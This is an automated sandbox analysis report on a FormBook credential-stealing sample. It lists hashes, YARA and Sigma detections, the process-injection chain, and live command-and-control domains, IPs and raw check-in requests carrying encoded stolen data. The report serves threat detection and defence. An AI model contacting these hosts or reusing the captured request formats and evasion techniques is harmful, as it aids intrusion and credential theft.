Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8htbxM8GPX.exe

Overview

General Information

Sample name:8htbxM8GPX.exe
renamed because original name is a hash value
Original sample name:8a854f74c740374fbd90a0d1b4c6012d.exe
Analysis ID:1501659
MD5:8a854f74c740374fbd90a0d1b4c6012d
SHA1:828660b6c850f9f20d1ca2aac4432fdda991dee2
SHA256:821475247fd0e03841c0d5dd9f0189bc6afb8932a8915a802e102659ca55fd11
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 8htbxM8GPX.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\8htbxM8GPX.exe" MD5: 8A854F74C740374FBD90A0D1B4C6012D)
    • svchost.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\8htbxM8GPX.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XWXkhXRHcDkPdE.exe (PID: 5548 cmdline: "C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7912 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • XWXkhXRHcDkPdE.exe (PID: 3164 cmdline: "C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8048 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\8htbxM8GPX.exe", CommandLine: "C:\Users\user\Desktop\8htbxM8GPX.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8htbxM8GPX.exe", ParentImage: C:\Users\user\Desktop\8htbxM8GPX.exe, ParentProcessId: 7524, ParentProcessName: 8htbxM8GPX.exe, ProcessCommandLine: "C:\Users\user\Desktop\8htbxM8GPX.exe", ProcessId: 7616, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\8htbxM8GPX.exe", CommandLine: "C:\Users\user\Desktop\8htbxM8GPX.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8htbxM8GPX.exe", ParentImage: C:\Users\user\Desktop\8htbxM8GPX.exe, ParentProcessId: 7524, ParentProcessName: 8htbxM8GPX.exe, ProcessCommandLine: "C:\Users\user\Desktop\8htbxM8GPX.exe", ProcessId: 7616, ProcessName: svchost.exe

            Suricata Signatures

            Timestamp:2024-08-30T09:42:06.562958+0200
            SID:2050745
            Severity:1
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-30T09:42:47.109778+0200
            SID:2050745
            Severity:1
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-30T09:40:31.695115+0200
            SID:2050745
            Severity:1
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-30T09:40:16.681474+0200
            SID:2050745
            Severity:1
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-30T09:42:33.714031+0200
            SID:2050745
            Severity:1
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-30T09:42:19.982608+0200
            SID:2050745
            Severity:1
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-30T09:39:51.496497+0200
            SID:2050745
            Severity:1
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-30T09:41:53.215210+0200
            SID:2050745
            Severity:1
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-30T09:43:00.311784+0200
            SID:2050745
            Severity:1
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.elettrosistemista.zip/fo8o/?elJtehkH=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&z8_=glwH5BKpAvira URL Cloud: Label: malware
            Source: http://www.liangyuen528.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.liangyuen528.com/fo8o/?elJtehkH=iiIkdrB6KYcVQoNzCqChYUKXjXuh+zOUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+WWEI+6zwDYddHqMnjE16qa6vLdOP6EYvTw8=&z8_=glwH5BKpAvira URL Cloud: Label: malware
            Source: http://www.kasegitai.tokyo/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.kasegitai.tokyo/fo8o/?elJtehkH=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&z8_=glwH5BKpAvira URL Cloud: Label: malware
            Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: phishing
            Multi AV Scanner detection for submitted file
            Source: 8htbxM8GPX.exeReversingLabs: Detection: 63%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190493627.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2018221773.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4193347183.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4191461171.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2018302081.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 8htbxM8GPX.exeJoe Sandbox ML: detected
            Source: 8htbxM8GPX.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XWXkhXRHcDkPdE.exe, 00000005.00000000.1937047928.00000000002DE000.00000002.00000001.01000000.00000005.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000000.2084677032.00000000002DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2014186824.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919454777.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1921246869.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4191758383.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2013356059.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2018934901.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4191758383.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2014186824.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919454777.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1921246869.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4191758383.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2013356059.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2018934901.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4191758383.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1982197779.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2013903971.0000000003400000.00000004.00000020.00020000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000005.00000003.1952930659.0000000000A5B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4190676989.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4192324042.000000000340C000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000000.2085236634.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2311200838.0000000005A2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4190676989.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4192324042.000000000340C000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000000.2085236634.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2311200838.0000000005A2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1982197779.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2013903971.0000000003400000.00000004.00000020.00020000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000005.00000003.1952930659.0000000000A5B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0042BAB0 FindFirstFileW,FindNextFileW,FindClose,6_2_0042BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax6_2_00419480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi6_2_0041DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h6_2_02C2053E
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 4x nop then pop edi7_2_059D1D43
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 4x nop then pop edi7_2_059D1E4A
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 4x nop then mov esp, ebp7_2_059D0B87
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 4x nop then xor eax, eax7_2_059D62B5
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 4x nop then pop edi7_2_059E1A0E
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h8_2_00000151057E453E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 54.65.172.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 15.197.212.58:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 15.197.240.20:80
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
            Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /fo8o/?elJtehkH=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&z8_=glwH5BKp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?elJtehkH=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&z8_=glwH5BKp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?elJtehkH=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&z8_=glwH5BKp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?elJtehkH=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk=&z8_=glwH5BKp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?elJtehkH=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&z8_=glwH5BKp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?elJtehkH=iiIkdrB6KYcVQoNzCqChYUKXjXuh+zOUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+WWEI+6zwDYddHqMnjE16qa6vLdOP6EYvTw8=&z8_=glwH5BKp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.liangyuen528.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?elJtehkH=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&z8_=glwH5BKp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?elJtehkH=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&z8_=glwH5BKp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?elJtehkH=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&z8_=glwH5BKp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 205Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 65 6c 4a 74 65 68 6b 48 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 6b 32 76 35 52 35 2f 76 72 4d 41 46 48 55 74 46 78 65 6f 65 77 36 43 2b 6b 42 51 62 2f 41 4c 52 41 3d 3d Data Ascii: 